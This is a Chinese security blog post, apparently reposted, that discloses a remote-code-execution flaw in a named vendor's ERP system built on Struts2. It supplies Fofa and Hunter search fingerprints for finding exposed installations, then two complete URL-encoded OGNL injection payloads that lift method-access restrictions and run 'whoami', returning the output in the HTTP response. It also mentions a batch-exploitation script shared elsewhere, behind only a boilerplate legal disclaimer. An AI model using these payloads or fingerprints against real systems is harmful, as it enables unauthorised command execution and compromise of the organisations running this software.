某乔ERP系统存在RCE漏洞，附POC脚本！

0x01 概述

杭州圣乔科技有限公司主要研发全套工业企业ERP系列软件产品，现在公司已经形成ERP 软件、OA办公管理、等四大系列二十小类软件产品。致力于为政府、教育、医疗卫生、文化事业、公共事业（电、水、气等）、交通、住建、应急、金融、电信运营商、企业等用户提供专业的信息化、智能化、数字化服务。

0x02 正文

Fofa指纹：app="圣乔-ERP系统"

鹰图指纹：web.icon="d2c808114296ddd9e76e9c774d79bd43"

由于此ERP系统使用Struts2开发框架组件，均存在历史遗留漏洞，可直接利用Struts2的Nday漏洞进行渗透攻击

执行whoami命令

POC：

payload1：

screen.width=1&screen.height=1&encode=1&operate=11&UI=0&user=1&password=c4ca4238a0b923820dcc509a6f75849b&switching=true&redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22whoami%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D=1

payload2：

screen.width=1&screen.height=1&encode=1&operate=11&UI=0&user=1&password=c4ca4238a0b923820dcc509a6f75849b&switching=true&redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22whoami%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D&cachePass=1

也可以使用专项检测利用工具进行识别攻击

批量化脚本：

0x03结尾

POC批量化测试脚本已经在很早之前传至纷传圈子上了

文章来源：狐狸说安全

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END